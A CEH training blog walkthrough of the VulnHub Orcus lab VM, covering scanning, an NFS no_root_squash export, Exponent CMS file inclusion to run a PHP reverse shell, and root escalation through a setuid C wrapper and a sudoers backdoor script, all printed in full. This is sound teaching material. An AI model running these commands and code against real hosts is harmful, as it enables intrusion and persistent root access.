VulnHub Orcus Walk Through - CEH Training

As part of our cyber security training courses, such as Certified Ethical Hacker, we usually spend the last day, once the official material has been covered, giving students some practical experience: we pick an image from VulnHub and see how far the class can get, as a group, at capturing the flags.

Orcus Walk Through - CEH Training March 2017

This blog post is a walk through of the Orcus image from 15 March 2017. We found 4 flags but are not sure whether two of them are in fact one flag that has been duplicated. It will be interesting to see what tack others take to crack this and what flags they find.

Scanning Phase - nmap

With the VM image up and running we start at the scanning stage with trusty nmap. We use insane timing (-T5) in class to shorten the scan time, accepting that on a lossy link it can drop probes and miss ports, but would adopt a more cautious approach in a real-world pen testing scenario. We would also use a scanning technique less likely to raise alarms if the target is running an IDS/IPS and, of course, use proxies.

sudo nmap -T5 -sT -p1-65535 -O -A <ip address>

We get the following scan results:

Nmap scan report for 192.168.122.32
Host is up (0.00023s latency).
Not shown: 65519 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 3a:48:6e:8e:3f:32:26:f8:b6:a1:c6:b1:70:73:37:75 (RSA)
|_  256 04:55:e6:48:50:d6:93:d7:12:80:a0:68:bc:97:fa:33 (ECDSA)
53/tcp    open  domain      ISC BIND 9.10.3-P4-Ubuntu
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp    open  http        Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 30 disallowed entries (15 shown)
| /exponent.js.php /exponent.js2.php /exponent.php 
| /exponent_bootstrap.php /exponent_constants.php /exponent_php_setup.php 
| /exponent_version.php /getswversion.php /login.php /overrides.php 
| /popup.php /selector.php /site_rss.php /source_selector.php 
|_/thumb.php
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp   open  pop3        Dovecot pop3d
|_pop3-capabilities: RESP-CODES PIPELINING TOP STLS SASL AUTH-RESP-CODE UIDL CAPA
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-09T03:44:10
|_Not valid after:  2026-10-09T03:44:10
|_ssl-date: TLS randomness does not represent time
111/tcp   open  rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      47691/udp  mountd
|   100005  1,2,3      57193/tcp  mountd
|   100021  1,3,4      33400/udp  nlockmgr
|   100021  1,3,4      41522/tcp  nlockmgr
|   100227  2,3         2049/tcp  nfs_acl
|_  100227  2,3         2049/udp  nfs_acl
139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: ORCUS)
143/tcp   open  imap        Dovecot imapd
|_imap-capabilities: IDLE post-login Pre-login SASL-IR LOGINDISABLEDA0001 listed ENABLE IMAP4rev1 STARTTLS LITERAL+ OK have ID capabilities LOGIN-REFERRALS more
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-09T03:44:10
|_Not valid after:  2026-10-09T03:44:10
|_ssl-date: TLS randomness does not represent time
443/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 3a:48:6e:8e:3f:32:26:f8:b6:a1:c6:b1:70:73:37:75 (RSA)
|_  256 04:55:e6:48:50:d6:93:d7:12:80:a0:68:bc:97:fa:33 (ECDSA)
445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: ORCUS)
993/tcp   open  ssl/imap    Dovecot imapd
|_imap-capabilities: CAPABILITY
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-09T03:44:10
|_Not valid after:  2026-10-09T03:44:10
|_ssl-date: TLS randomness does not represent time
995/tcp   open  ssl/pop3    Dovecot pop3d
|_pop3-capabilities: RESP-CODES PIPELINING TOP AUTH-RESP-CODE SASL(PLAIN) USER UIDL CAPA
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-09T03:44:10
|_Not valid after:  2026-10-09T03:44:10
|_ssl-date: TLS randomness does not represent time
2049/tcp  open  nfs         2-4 (RPC #100003)
41522/tcp open  nlockmgr    1-4 (RPC #100021)
52285/tcp open  mountd      1-3 (RPC #100005)
57193/tcp open  mountd      1-3 (RPC #100005)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      47691/udp  mountd
|   100005  1,2,3      57193/tcp  mountd
|   100021  1,3,4      33400/udp  nlockmgr
|   100021  1,3,4      41522/tcp  nlockmgr
|   100227  2,3         2049/tcp  nfs_acl
|_  100227  2,3         2049/udp  nfs_acl
59568/tcp open  mountd      1-3 (RPC #100005)
MAC Address: 52:54:00:C5:3B:66 (QEMU virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.0
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: ORCUS, NetBIOS user: , NetBIOS MAC:  (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: orcus
|   NetBIOS computer name: ORCUS
|   Domain name: 
|   FQDN: orcus
|_  System time: 2017-03-21T12:27:15-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol

TRACEROUTE
HOP RTT     ADDRESS
1   0.23 ms xx.xx.xx.xx

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.77 seconds

There is a lot of attack surface here, which is one of the challenges of this particular image. One interesting point to note is that SSH is listening on port 22 and port 443, traditionally the https port. We are not sure what this means at this stage so simply note it and move on.

With so much to go through we take a quick look at what is available, starting with HTTP on port 80. We don't bother with 443 yet as it is running SSH, not HTTPS.

Gather Information on Port 80 Applications

Browsing to port 80 shows us the default Orcus welcome page. We follow the links available and note nothing interesting other than the fact that the pages are just images. If we get stuck we could come back later and check the images for hidden information. We also take a quick look at the page source, but it looks like a dead end. We then examine the robots.txt file, and there is something interesting there. We note it down for further investigation and move on.

Robots.txt

user-agent: *
Crawl-delay: 5
# (ASCII-art banner spelling ORCUS; mangled by the page extraction and omitted here)
Disallow: /exponent.js.php
Disallow: /exponent.js2.php
Disallow: /exponent.php
Disallow: /exponent_bootstrap.php
Disallow: /exponent_constants.php
Disallow: /exponent_php_setup.php
Disallow: /exponent_version.php
Disallow: /getswversion.php
Disallow: /login.php
Disallow: /overrides.php
Disallow: /popup.php
Disallow: /selector.php
Disallow: /site_rss.php
Disallow: /source_selector.php
Disallow: /thumb.php
Disallow: /ABOUT.md
Disallow: /CHANGELOG.md
Disallow: /CREDITS.md
Disallow: /INSTALLATION.md
Disallow: /LICENSE
Disallow: /README.md
Disallow: /RELEASE.md
Disallow: /TODO.md
Disallow: /cgi-bin/
Disallow: /cart/
Disallow: /login/
Disallow: /users/
Disallow: /files/
Disallow: /tmp/
Disallow: /search/

# Sitemap: http://www.mysite.com/sitemap.xml

Poking around Port 22/443

We ssh to ports 22 and 443 and try root/root, root/password and root/admin. You never know :) But as suspected, no luck. We next tackle the imap(s) and pop3(s) ports, telnetting to them to see if there is anything unusual, but they look like a dead end. We note them down and will come back if all else fails.

We also issue a dig command against the DNS server on port 53 to see if anything interesting happens, but we get a normal DNS response.

dig @xx.xx.xx.xx google.com ANY

Network Shares - Samba/NFS

Next we move on to the interesting high ports, 47691 and 57193. rpcinfo identifies these as mountd, part of NFS, and that could be interesting. But first we look at the Samba ports, as in capture-the-flag contests this is usually the more popular service for stashing clues and hosting potential vulnerabilities. Running

smbclient -L <IP Address>

reveals nothing interesting.

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	IPC$            IPC       IPC Service (Orcus server (Samba, Ubuntu))
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]

	Server               Comment
	---------            -------
	ORCUS                Orcus server (Samba, Ubuntu)

NFS - Our First Big Break

Let's continue to search for low-hanging fruit, although the web application is looking more and more like the likely point of attack. But first let's look at the NFS service. What shares are exported, and are they protected? We run

showmount -e xx.xx.xx.xx
Export list for xx.xx.xx.xx:
/tmp *

Bingo! /tmp is exported, and the * means any client may mount it. Let's see if we can.

sudo mount -t nfs <ip address>:/tmp /mnt

It works! Lets see what we have. Running

ls -l /mnt
drwx------ 3 root     root        4096 Mar 21 09:26 systemd-private-2de4032a6b514198bc55edb78217e912-dovecot.service-HyFAmJ
drwx------ 3 root     root        4096 Mar 21 09:26 systemd-private-2de4032a6b514198bc55edb78217e912-systemd-timesyncd.service-5td805

We can't read these directories, but can we write a new file?

touch /mnt/test

Running "ls -l /mnt" again shows that the file is created and owned by UID 1000, the UID of our currently logged-in user, so the server simply records whatever UID the client presents. What if we try to make the file owned by root? As root on our own machine:

sudo chown root:root /mnt/test

It works! Let's chalk up the first major find. The export is not squashing root (the no_root_squash option), so root on our client is root on the server's /tmp: we can create files owned by root, set them executable, even setuid, and basically upload anything we want to the share. But how do we get a file to execute?
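For reference, here is the kind of /etc/exports entry that produces this behaviour, beside a safer one. This is an added illustration, not the Orcus image's own exports file, which we never saw: the options on the weak line are inferred from what showmount and the chown test showed (world export, writable, root not squashed), and the client network on the safer line is assumed.

```text
# Weak: any host may mount /tmp read-write, and a client's root stays root
/tmp    *(rw,sync,no_root_squash)

# Safer: restrict the client range and keep the default root_squash, so a
# remote root is mapped to nobody; all_squash maps every remote user to nobody
/tmp    192.168.122.0/24(rw,sync,root_squash)
```

After editing, "exportfs -ra" reloads the table and "exportfs -v" shows the effective options, which is the quickest way to confirm root_squash is actually in force.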

Back to the Web Application

After trying to think of innovative ways to do this we decide to look again at the web application. From our initial mapping exercise we note the references in robots.txt to files named exponent. We also browse to some of the robots.txt directories like /files and note that directory listings are enabled. A good sign for us. We run nikto against it for good measure.

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          xx.xx.xx.xx
+ Target Hostname:    xx.xx.xx.xx
+ Target Port:        80
+ Start Time:         2017-03-21 18:58:59 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x65 0x53ff6086e56aa 
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie PHPSESSID created without the httponly flag
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/exponent.js.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/exponent.js2.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/exponent.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/exponent_bootstrap.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/exponent_constants.php' in robots.txt returned a non-forbidden or redirect HTTP code (500)
+ Entry '/exponent_php_setup.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/exponent_version.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/getswversion.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/login.php' in robots.txt returned a non-forbidden or redirect HTTP code (302)
+ Entry '/overrides.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/selector.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/site_rss.php' in robots.txt returned a non-forbidden or redirect HTTP code (302)
+ Entry '/source_selector.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/thumb.php' in robots.txt returned a non-forbidden or redirect HTTP code (302)
+ Entry '/ABOUT.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/CHANGELOG.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/CREDITS.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALLATION.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/README.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/RELEASE.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/TODO.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /files/: Directory indexing found.
+ Entry '/files/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /tmp/: Directory indexing found.
+ Entry '/tmp/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 30 entries which should be manually viewed.
+ Multiple index files found: /index.php, /index.html
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.23). Apache 2.2.31 is also current for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-2870: /index.php?download=/etc/passwd: Snif 1.2.4 allows any file to be retrieved from the web server.
+ OSVDB-59085: /index.php?|=../../../../../../../../../etc/passwd: Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem.
+ /index.php?page=../../../../../../../../../../etc/passwd: The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host. (probably Rocket, but could be any index.php)
+ OSVDB-59085: /index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd: Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem.
+ OSVDB-8193: /index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwd: EW FileManager for PostNuke allows arbitrary file retrieval.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3092: /files/: This might be interesting...
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3092: /tmp/: This might be interesting...
+ OSVDB-3093: /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /test.php: This might be interesting...
+ /phpmyadmin/: phpMyAdmin directory found
+ 9552 requests: 0 error(s) and 48 item(s) reported on remote host
+ End Time:           2017-03-21 18:59:12 (GMT2) (13 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

There is so much here that we spend a bit of time exploring, but we start to feel we are being led astray, as some of the URLs like test.php do nothing observable or appear to be red herrings. It does look like a half-installed or misconfigured application, which may offer some non-obvious vulnerabilities.

The directory traversal vulnerabilities listed by nikto also appear to be false positives. Let's switch tracks and work out which application these files belong to. We note the repeated use of "exponent" in the file names found by nikto and listed in robots.txt. A quick Google reveals a likely candidate: Exponent CMS. This is looking more promising now.

Exponent CMS - Our Next Big Break

Next we Google for Exponent CMS vulnerabilities, which turns up a wealth of possibilities. The first one we pick looks promising: an unrestricted file upload plus a local file inclusion vulnerability, which chained together give us remote code execution. For completeness we query our local exploit-db copy with "./searchsploit exponent", which shows the following:

-------------------------------------------------------------------------------------------------------------------------------- -----------------------------------
 Exploit Title                                                                                                                  |  Path
                                                                                                                                | (/opt/exploit-database/platforms/)
-------------------------------------------------------------------------------------------------------------------------------- -----------------------------------
Exponent CMS 0.96.3 - (view) Remote Command Execution                                                                           | php/webapps/2391.php
Exponent CMS 0.96.3 - (articlemodule) SQL Injection                                                                             | php/webapps/11349.txt
Exponent CMS 0.97 - Multiple Vulnerabilities                                                                                    | php/webapps/15247.txt
Exponent CMS 2.0 Beta 1.1 - Cross-Site Request Forgery (Add Administrator Account) (PoC)                                        | php/webapps/17235.html
exponentcms 2.0.5 - Multiple Vulnerabilities                                                                                    | php/webapps/18773.txt
Exponent CMS 2.3.9 - Blind SQL Injection                                                                                        | php/webapps/40412.txt
Exponent CMS 0.95 - Multiple Cross-Site Scripting Vulnerabilities                                                               | php/webapps/25058.txt
Exponent CMS 2.2.0 Beta 3 - Multiple Vulnerabilities                                                                            | php/webapps/25518.txt
Exponent CMS 0.96.5/0.96.6 - magpie_debug.php url Parameter Cross-Site Scripting                                                | php/webapps/29870.txt
Exponent CMS 0.96.5/0.96.6 - magpie_slashbox.php rss_url Parameter Cross-Site Scripting                                         | php/webapps/29871.txt
Exponent CMS 0.96.5/0.96.6 - iconspopup.php icodir Variable Traversal Arbitrary Directory Listing                               | php/webapps/29872.txt
Exponent CMS 0.97 - 'Slideshow.js.php' Cross-Site Scripting                                                                     | php/webapps/34265.txt
Exponent CMS 2.0.0 Beta 1.1 - Local File Inclusion / Arbitrary File Upload                                                      | php/webapps/35717.txt
Exponent CMS 2.3.1 - Multiple Cross-Site Scripting Vulnerabilities                                                              | php/webapps/36059.txt
Exponent CMS 2.0 - 'src' Parameter SQL Injection                                                                                | php/webapps/36916.txt
-------------------------------------------------------------------------------------------------------------------------------- -----------------------------------

Time to roll up the sleeves! The Exponent CMS exploit has two parts:

  1. A way to upload an arbitrary file and then
  2. An inclusion vulnerability to invoke the file.

We try the upload part first. Copying the HTML form contained in the advisory into an upload.html page is trivial. All we need to do is change the host name in the form's action attribute to the target's IP address.

The security bulletin mentions that some brute forcing will be necessary to "guess" the name of the uploaded file. We notice that the Exponent code uploads to the /tmp directory.

This is the same directory we have mounted under /mnt via the NFS misconfiguration found above. Uploading a file via the unrestricted upload vulnerability doesn't produce a file in /tmp when we run "ls /mnt", as we expected it would, but we have missed the wood for the trees: we don't need the upload at all. We can simply copy a file to /mnt and then try to execute it via the file inclusion vulnerability.

Get Shell Access - Upload php-reverse-shell to Our NFS Mount

So we copy a simple test.php file that prints some text to /mnt and try the URL (from the security bulletin above)

http://ip-address/install/popup.php?page=../../../../../tmp/test

We have to fiddle with the number of directory traversals a little, but finally it works. (Overshooting is harmless: once the path reaches /, extra ../ components are ignored, so erring on the side of more is fine.) Our next step is to copy over the reverse shell code from pentestmonkey, edited to connect back to our IP address. There is some danger here while your host is listening for incoming connections, and in a pen test this would normally be done through a proxy to avoid being traced back to the source.

Our First Flag

On our machine we start a listener (this is the OpenBSD netcat syntax; traditional netcat wants "nc -l -p 1234"):

nc -l local-ip-address 1234

Then visit the url

http://ip-address/install/popup.php?page=../../../../../tmp/php-reverse-shell.php

and we are in. Time to start poking around. We quickly pick up the first flag in /var/www/flag.txt (868c889965b7ada547fae81f922e45c4).

SSH Honey Pot - Kippo

Now to see about escalating privileges from www-data to root. We spent a bit of time here gathering info and trying to figure out what to do. Once we did, we were a bit ashamed we hadn't thought of it earlier. We took the scenic route.

There are a lot of files in the /var/www directory and we spend some time looking for config files that might contain database usernames and passwords, since we think there might be a flag related to MySQL and phpMyAdmin, but to no avail. The zenphoto-zenphoto-1.4.10 directory in /var/www appears to be a red herring.

We "cat /etc/passwd" to see if there are any accounts we might need to brute force and discover a user called kippo. "id kippo" shows this user is in the sudo group. We wasted a bit of time trying to figure out whether we could compromise this account as a way to sudo to root, but ultimately this was a dead end. Maybe there is a way to use this account to gain root access, but we found another way.

Our 2nd & 3rd Flag

After running "find / -user kippo" we discover a bunch of files under /etc/kippo. Some Googling reveals this is an SSH honeypot application. Since the files are world-readable we poke around looking for passwords or similar in the config files. Here we find two more flags. These are the ones we are not sure are duplicates. There is one in /etc/kippo/kippo.cfg:

# Port to listen for incoming SSH connections.
# user:1:TH!SP4SSW0RDIS4Fl4G!

There is another in the file /etc/kippo/data/userdb.txt

fakuser:1:TH!SP4SSW0RDIS4Fl4G!

Initially we thought that the SSH server on port 22 was the honeypot, as the config file is set to listen on port 22, but after some scratching around it appears the honeypot is not running: "ps aux" shows no such process. The nmap output agrees, since ports 22 and 443 present identical host key fingerprints, so both are the same real OpenSSH.

MySQL Investigation

We turn our attention to MySQL and PostgreSQL, which are listening on localhost only. We notice that MySQL has a custom install in /mysql-5.7.14, but the instance that is running appears to be the default Ubuntu package. We check exploit-db and there are numerous exploits for this MySQL version. The most applicable ones require an existing username and password. We note this and continue our search. We tried other MySQL exploits that do not require a valid MySQL user, but they fail to execute; it later appears that AppArmor is providing some protection.

PostgreSQL has a limited attack surface and appears to be another diversion, so we move on.

Since we can't seem to find anything under kippo or MySQL we move on and examine the /var/www directory again. We notice that the /var/www/html directory is not readable. Since we are the owner we simply "chmod +r /var/www/html", and there is a host of interesting stuff. Most of it appears to be distraction, but the backups directory looks promising.

$ ls -l /var/www/html/backups
total 216
-rw-r--r-- 1 www-data www-data 215368 Oct 31 20:29 SimplePHPQuiz-Backupz.tar.gz
-rw-r--r-- 1 www-data www-data     12 Nov  1 21:33 ssh-creds.bak

We immediately cat the "ssh-creds.bak" file, but the root password it contains is bogus. Next we download SimplePHPQuiz-Backupz.tar.gz from http://ip-address/backups/SimplePHPQuiz-Backupz.tar.gz. It contains the backup of a web application, so we start looking for its config file, and we find it: SimplePHPQuiz/includes/db_conn.php, which holds database credentials.


With a sense of excitement we jump over to phpMyAdmin and log in with those credentials. We waste time here examining databases and looking for another flag or a privilege escalation vulnerability. There are a few listed in exploit-db that seem promising, and since we now have a username and password we try some out, but they do not work.

Privilege Escalation

Getting a little frustrated, we clear our minds, drink some coffee and visualise root. Then it comes to us. We can put any file, with any owner and any permissions we want, into /tmp via /mnt. We can just drop in a setuid root binary and execute it from the www-data shell we got through popup.php. We have a Homer Simpson moment.

We create a shell script "exploit.sh" under /mnt and change its ownership to root:root.

#!/bin/sh
# exploit.sh: run as root via the setuid wrapper; gives group www-data
# passwordless sudo. Appending straight to /etc/sudoers works, but a typo
# there breaks sudo for everyone; "visudo -c" checks the syntax afterwards.
echo "trying..."
echo "%www-data ALL=(ALL:ALL) NOPASSWD: ALL" >> /etc/sudoers
echo "done"

But Linux ignores the setuid bit on interpreted scripts, so we use a small setuid wrapper written in C that runs our script. We edit the wrapper source to reference our script, then copy both the script and the source file to /mnt. On the reverse shell we change to /tmp and compile it:

gcc wrapper.c -o wrapper

We then make the binary root-owned and setuid. This has to be done from the NFS client as root, since on the target we are only www-data and a setuid binary owned by www-data gains us nothing. chown first, because changing the owner of an executable clears its setuid bit:

sudo chown root:root /mnt/wrapper
sudo chmod u+s,a+x /mnt/wrapper

Back in the reverse shell we invoke our script with ./wrapper. Two things make this work: the export does not squash root, and /tmp on the target is not mounted nosuid.
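The wrapper we used is not shown above, so here is a worked one, added for this write-up rather than taken from the original post. It assumes the script sits at /tmp/exploit.sh (where our NFS copy lands) and that the binary has been made root-owned and setuid from the NFS client; the target_ok check and the fixed PATH are our own hardening, not part of the original approach.

```c
/* wrapper.c: minimal setuid-root wrapper that runs a fixed shell script.
 * Added example; the original post only says "we use a setuid wrapper" and
 * does not show its source. The script path is an assumption based on the
 * post (exploit.sh copied into the exported /tmp). */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define TARGET_SCRIPT "/tmp/exploit.sh"   /* assumed location of exploit.sh */

/* Become uid/gid 0 for real, not just effective, so the child keeps root
 * after exec. Returns 0 on success, -1 if the kernel refuses, which is what
 * happens when the binary is not root-owned setuid or /tmp is mounted nosuid. */
int become_root(void)
{
    if (setgid(0) != 0)
        return -1;
    if (setuid(0) != 0)
        return -1;
    return 0;
}

/* Only run an absolute, non-traversing path that exists and is readable:
 * a relative path or PATH lookup would let whoever controls cwd or PATH
 * choose what runs as root. Returns 1 if the path is acceptable. */
int target_ok(const char *path)
{
    if (path == NULL || path[0] != '/' || strstr(path, "/../") != NULL)
        return 0;
    return access(path, R_OK) == 0;
}

int main(void)
{
    if (become_root() != 0) {
        perror("setuid");          /* not setuid root, or mounted nosuid */
        return 1;
    }
    if (!target_ok(TARGET_SCRIPT)) {
        fprintf(stderr, "refusing to run %s\n", TARGET_SCRIPT);
        return 1;
    }
    /* Scripts cannot be setuid, so exec the interpreter on the script with a
     * clean environment; the script itself then runs as root. */
    char *const argv[] = { "/bin/sh", TARGET_SCRIPT, NULL };
    char *const envp[] = { "PATH=/usr/sbin:/usr/bin:/sbin:/bin", NULL };
    execve("/bin/sh", argv, envp);
    perror("execve");
    return 1;
}
```

Compile on the target with gcc wrapper.c -o wrapper, then from the NFS client as root chown root:root and chmod u+s,a+x the binary, in that order. If running it prints "setuid: Operation not permitted", check the ownership and mode with ls -l and confirm /tmp is not mounted nosuid (findmnt /tmp on the target).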

Final Flag /root/flag.txt

Now we try "sudo ls /root" and it works. So we run "sudo passwd" to set a root password, and now we can ssh in as root. There is a file under root, /root/flag.txt (807307b49314f822985d0410de7d8bfe). This we hope is the final flag. We look for another but can't find any.
